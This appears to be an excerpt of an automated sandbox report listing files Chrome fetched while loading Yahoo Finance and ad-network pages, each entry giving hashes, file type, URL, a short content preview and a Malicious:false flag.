                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:397BB96D6782E0794FD5756040CEF94E4305DCC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F378E5AFCE569D2300A90E46DB2F858A15A2B9E09B052203B678CBD445154886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D71D58C115D5A7EF0984C75EA6411E91015031EB65347C726D291AAE913B6450A8CAB020258818460FE2D1E949A1E63A3962F9CBB3B1A6090A63830FE5A8B18A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/MarketsTableWrapper.7xIMkJar.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as x,e as V,b as Q,d as j,f as H,j as R,i as p,q as Z,k as g,l as ee,n as K,p as U,N as fe,V as ce,t as ye,h as Ie}from"./scheduler.Dr9AAxFe.js";import{S as Ae,i as Pe,t as d,g as D,a as b,e as E,c as I,b as C,m as M,d as S}from"./index.DCSmZEjO.js";import{N as Oe}from"./NavBar.DMjInWD3.js";import{D as Le}from"./DataTable.BD-itA9y.js";import{e as ze,h as Ve,g as je,t as G,q as ue}from"./commonUtil.CI22_Irn.js";import{M as B,a as $,g as He,b as Ue}from"./marketsUtil.ScItRG1n.js";import{f as Qe,l as Me}from"./logUtil.hOue7iAU.js";import{l as Re}from"./loadPredefinedListDetail.CYCLrdaP.js";import{l as We}from"./loadQuote.D9BAmXuK.js";import{l as qe}from"./loadTrendingTickers.BmFT6E7u.js";import{D as Be}from"./DataTablePagination.D9SvUQqJ.js";import{a as Ge}from"./headerUtil.D8XWvN0j.js";import{l as Ze}from"./loadQSPLeafNews.lDua51cx.js";import{n as Ke}from"./sectorUtil.CQpnlAmT.js";import{G as Se}from"./GradientScale.EwYudrQa.js";import{S as Ye,O as me}from"./Select.N-a6-Z3E.js";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3348)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.47481549441775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:tlCSnLj6fPf7vdzZN5vzIuD1zEGghaHu9+xQga:tlCM36PzdzZNgG+mu9+xQr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B0900C97C99D591AF4F5B31558445EED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BDB1AE91FBCE4B27C7138B6CB482A54D55CFB5DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B35CC7C38DD75425F6AFCBA3650F73871CE9A32EDF61A2994618B1E1D1221E6A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FC5349DADD6966BD46AEB6828B0F37C5CFE8CC308E45E0F4AC66BD6A8E5178CE46EFD45D0C1F0E1DB16C136638876495A821DCE752F84D82698527B9B39F97BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var p=ca(this);function q(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}} .function da(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}var ea=typeof Object.create==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Radiance HDR image data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):104536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.244901013582713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:mIFk4Rd3HeqfTxRF6f+TO7ClnmqgFxcTH:bz8q7x/i2OG5mqgoD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AAFAE3373018D2B833B61DF6F0E4C328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A2DC733692EBDF1EF33A63E51207B6B5FBC799FC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DB0B6C5AF55B217512543878B20D6A3C02B6722649CD22159CE08A8F7E6D93E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A47B6D01A59802156BA3596D5F99E59DE30B1D116A28BF3E5F91F2C707B5913FE05B47E47D2BE83A3E9F71322BAE0ED4008AB94D0CA9AD15E316718249CA4F1D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/creatives/assets/4309308/Ostrich_Road_Custom_Flip_T02_8_new_compress.hdr.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:#?RADIANCE.# Made with Adobe Photoshop.FORMAT=32-bit_rle_rgbe..-Y 128 +X 256......................................................................................ZYZZZY...................................................................................a....................................................................................................................................................__^^]]\\[[Z............YZZ.[.Z.["Z..................[[......................................................................................[.\.]]]^^^___``aabceecbbaa``__^^._.`.a.`._.^.].\.].^._.e.ddccbba............aaa.b.a.b.a...............cc.........................................................................................bbbccc.d.e.ffggghhijlljiiihhgggff.g.f.e.d.c.d.e.f.....................................................................................................................................................................................................[[Z..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://rp.liadm.com/j?dtstmp=1728414859005&did=did-004f&se=e30&duid=05c3ae107b3d--01j9prvepm5bg3skme87jhf522&tv=8.51.0&pu=https%3A%2F%2Fwww.yahoo.com%2F&wpn=prebid&gdpr=0&refr=https%3A%2F%2Fortkn.lovationyme.com%2F&cd=.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5070)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5071
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.154279591983011
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:yCCs0XQaOSvruAe49pph485P1z9N8fxuOh7Snxqqcp3Dr:KzjrPeqrhBWGD+Dr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4B4CAA230C1D0883BB6B688B56177440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6E7835E19976DE3C78B4DA88D688A9B4BB25E3DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E197B1B3E813A5D2282D5AA19FFEC0CCF1B4F62C0B09BEE72B4B31FBC58CDEA4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:75EFF1EA2F3EEC2CA7258AB4853AF8F26AA82CBB6B1226C3EF97BC8A7AF61D6BD1DCD9460E593F20AC15A11E6183B35A609C7C44AC4606A18D44CA2DA45BE5D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/a11y-dialog.esm.BnYZCIGX.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var m=Object.defineProperty;var p=(e,t,i)=>t in e?m(e,t,{enumerable:!0,configurable:!0,writable:!0,value:i}):e[t]=i;var r=(e,t,i)=>(p(e,typeof t!="symbol"?t+"":t,i),i);const n={inert:":not([inert]):not([inert] *)",negTabIndex:':not([tabindex^="-"])',disabled:":not(:disabled)"};var E=[`a[href]${n.inert}${n.negTabIndex}`,`area[href]${n.inert}${n.negTabIndex}`,`input:not([type="hidden"]):not([type="radio"])${n.inert}${n.negTabIndex}${n.disabled}`,`input[type="radio"]${n.inert}${n.negTabIndex}${n.disabled}`,`select${n.inert}${n.negTabIndex}${n.disabled}`,`textarea${n.inert}${n.negTabIndex}${n.disabled}`,`button${n.inert}${n.negTabIndex}${n.disabled}`,`details${n.inert} > summary:first-of-type${n.negTabIndex}`,`iframe${n.inert}${n.negTabIndex}`,`audio[controls]${n.inert}${n.negTabIndex}`,`video[controls]${n.inert}${n.negTabIndex}`,`[contenteditable]${n.inert}${n.negTabIndex}`,`[tabindex]${n.inert}${n.negTabIndex}`];function h(e){(e.querySelector("[autofocus]")||e).focus()}function y(e){cons
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?p=137711&s=137812&predirect=https%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D58%263pid%3D&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.984902516506271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:edBE3Tp2c/SPbP+G1RvhBDHR4i4g3FsimyM:esT9KbN/vDOi4g3Fs+M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5B171196CD4A44D58361A1465CAC06B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:239EF79CC393E6EA99A92056A601F5CAF89C4E27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:575E4F23526D512C19A0FF0786BAD57B401B439C8DEAAC94F50F90E86BCE8C9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A362ED6E0C3691CDABEF9669F26078096E480B7891847FA62DD464850AB9C3EE4E6F033ED831BECA1E167031C584EE782888281D76D6D0A6C1473B69B66C0D63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/2NW2CfWeNKI57cwpeOIBFw--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-01/bedd8160-ab13-11ee-bbab-76c907c64d8d.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFFt1..WEBPVP8 h1......*,...>y..F..!.1..P...@..O.g....=.2y...}*m..#........T&./.....>.....?.....~.......F.w...?....M.?..}C.0........d.....^.^.}.....^6.........~!?...........A?Y...k............s_.....?h.../;.).j.H.]..k.2...%...-=.-......].B....~..w.N..m....._CV5.j..&..V,*.....T.......o....A.....%.&.....l..k..{L..A..Q...."m.^...ENwl...u.}H.....)3...........e=c.....8<........1....'.(....8...=....LX..[8_8O..<.f...|.$g)8......_s.Y......&.M.M... ..z...L3!k.m..-....f......A$......0...l^!7....w..0,M^.G....v...N}.^..}....+6.E...u. .A?O.Z...~T.G....Q.2..2.$.K.....&.........)#i.,z.../..M..>hz.CN.^I..._.<.xvpVWe....g...M....XX.....qhC..i...l.g.O..3...O.78.-......?f.W.r..o.ph..._..5V..=SW7d0...,.bW...i............P...Kjy;...{.j...+.J`...jv._...&.M...v!.%..&@S.tu0..-.?S.S..s....ED.W-.'...V......w?..|..&.....|.p.<F(6n.\..():.(...5.....R>.....Q....(U.A...p.1.pE..}n.y.....RQ...Cp.,.Q.wq'.v..._.5...[.o........Q...4..p.aZ..0..-....o...V..X..n......j! X..|...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8525)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.977166439123678
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:m3T4gHzfbl5YYlK9zoBbby4y1wlcTWxGwJPpDU0O4yitk4MNizq9+Foxnatn:A4gTDzYYU9zEWM30nyn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F0A7E61EA9D2D0BB563FB504EF8F5B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B9449D9D844B8F7299A99CDFD0E90BF742A3FAE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7BC4719E59C7A7236F2806A1661EE6AD861F6221C5DF991BB76AB4AB5A567D3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ED01C095229611B873C928B63F8B65BBBF36E2D40ED3D29BE637794C6D424CC37238B388853091CD72F76C04523B5F3566E3610A84EFFD8D6C7461EA40E85034
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/StoryItem.CsmwoRFQ.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.liveBlog.yf-gpvsaf.yf-gpvsaf{display:flex;flex-flow:row wrap;gap:var(--space-1);align-items:center;justify-content:center;margin-top:-1px}.liveBlog.yf-gpvsaf .fin-icon svg{font-size:var(--icon-size, .375rem)}.liveBlog.yf-gpvsaf .livestatus.yf-gpvsaf{font-size:var(--font-s);line-height:1.25;font-weight:var(--font-bold);color:var(--negative)}.category.yf-hclwtv{background-color:var(--surface1);border-radius:var(--border-radius-s);border:1px solid var(--surface1);flex:none;font-size:var(--font-xs);line-height:1.25rem;padding-left:.375rem;padding-right:.375rem}.taxonomy-links.yf-13tszyc{align-items:center;display:flex;flex:0 1 auto;flex-wrap:wrap;gap:var(--space-1)}.live-badge.yf-1adsqgi{font-size:var(--font-s);font-weight:var(--font-bold);line-height:1.125rem;color:var(--text-inverse);background-color:var(--negative);border-radius:var(--border-radius-s);padding:.125rem .375rem;margin-bottom:var(--space-2);vertical-align:top;width:-moz-max-content;width:max-content}.live-badge.yf-1adsqgi:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4698)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.322936178286471
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:idxotGX+4fR1pjXc1kSZGiDSpNOFU01Yf8DR+Q4k4z5cqgxrWHG9U9Ln+4qZYzla:mxoUXHf7pXqEiDSpNOFU01Yf8d+Qh423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BF16C6A984153FBD31CB5EE10407AFC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FDDD9FE01B3CE47CD64B6A048A15E45B638CAF2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C8CBC35919933AFAB21AFDBF036F310189E58B0FFBD2B045FF8E43F8F36CA01B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3721C3607DC73F82E0777BB040B643135E495F720428BFC3DA98F64DF655023B2871541292D191B379AA50A49B53E8C6BCAABA4DDA5BED297581DD94D2729A2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.DCSmZEjO.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var K=Object.defineProperty;var T=(t,e,n)=>e in t?K(t,e,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[e]=n;var I=(t,e,n)=>(T(t,typeof e!="symbol"?e+"":e,n),n);import{n as w,ai as W,i as V,aj as X,v as E,a0 as O,Q as j,ak as Y,a1 as N,af as Q,f as Z,al as tt,am as et,an as nt,ah as it,ag as U,ao as st,ap as rt,aq as at,ar as ft,as as ot}from"./scheduler.Dr9AAxFe.js";const G=typeof window<"u";let q=G?()=>window.performance.now():()=>Date.now(),B=G?t=>requestAnimationFrame(t):w;const k=new Set;function H(t){k.forEach(e=>{e.c(t)||(k.delete(e),e.f())}),k.size!==0&&B(H)}function D(t){let e;return k.size===0&&B(H),{promise:new Promise(n=>{k.add(e={c:t,f:n})}),abort(){k.delete(e)}}}const P=new Map;let R=0;function ut(t){let e=5381,n=t.length;for(;n--;)e=(e<<5)-e^t.charCodeAt(n);return e>>>0}function lt(t,e){const n={stylesheet:X(e),rules:{}};return P.set(t,n),n}function z(t,e,n,s,u,a,l,i=0){const c=16.666/s;let r=`{.`;for(let $=0;$<=1;$+=c){const m=e+(n-e)*a($);r+=$*100+`%{${l(m,1-m)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (16798), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.223409253489215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3+Ec6BG/PFvVHWahu22YXGjDmgTkgcpUh1HswyjIkr8EAe:OD+ipVHWa1c/TIUYjINe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F085D6C42ACB1394E457E463230DE8BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DEACA09E50FB2D08C90F07CC588A8B1B4C191732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F2C2013A67C8DD205E93EF40CF60DA7B3BB48A075E7B649FDE2B2F646B15896F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:029FDDCBD993E68E25B470D316CC94EF513AC536AB70C39F5B6920B6BEF6398F3BF77DD5F6067441337068566F1DCF408CDEC28DC22E03256E634AF644322875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-fetch-1.19.1-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-fetch"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.990791462240958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:2dVZZL8NdTv3lYAjeaxMcRcTX+TLRjUhZ88TzlSV29nLiFyGAhIhxCAOFTsWwK3p:c7R8NdTvVY6OST8883029nlhcmTNL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D216D3B4E5A67F022FA3EF4E71781439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5E6B829187DCD592B6C4F4998F513B6B77FC9D18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:54352CC37FAFE590444BC57BE54170A6CCB8A8EEB30A618911995780FAA8462E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5878820FE8632627043FD2FDCBB65F3CB614B06A786DBF719A80165187A804D5D23A74BD8E312073ED292C07DCA4D42A39D346D35D9C0B49362AA036D9E7B413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="32px" height="32px" viewBox="0 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 57.1 (83088) - https://sketch.com -->. <title>favicon_y19_32x32_custom</title>. <desc>Created with Sketch.</desc>. <defs>. <polygon id="path-1" points="0.171073913 0.0931111111 9.4455087 0.0931111111 9.4455087 9.92442222 0.171073913 9.92442222"></polygon>. </defs>. <g id="favicon_y19_32x32_custom" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <rect fill="#6001D2" x="0" y="0" width="32" height="32"></rect>. <g id="y!" transform="translate(5.000000, 6.000000)">. <polygon id="Fill-1" fill="#FFFFFF" points="9.70835927 5 7.04604411 11.4197051 4.40657437 5 0 5 4.91176421 16.0265583 3.14442407 20 7.45914574 20 14 5"></polygon>. <g id="!" transform="translate(12.000000, 0.000000)">. <path d="M2.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1473)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.442418925457835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:TNIIYW+h4XU6cRX+8DwWm0ZzStj4Z4hIl2Va+D23Xe8JBXM+FrLSdHCPzCppVKcb:TN9YW+hVPtwWJKfyTFrLUotEiGwGbNf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A66BACFC1DE7AE6219E9D661DD0178AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:710E49D7E87995695973021FB124C2030B6DE465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F392767BBC070DA0335CFB985A26F5FF14FC7003F0E775D8383813FD311BC4E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:82F75F9BEECCC86F991E3BA583A2AEE37378058FC86FDE5CE9C5BF84C3F7277051884F8426ADFF3AC545A554633A0008380461AC201F28879AD740055732C099
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
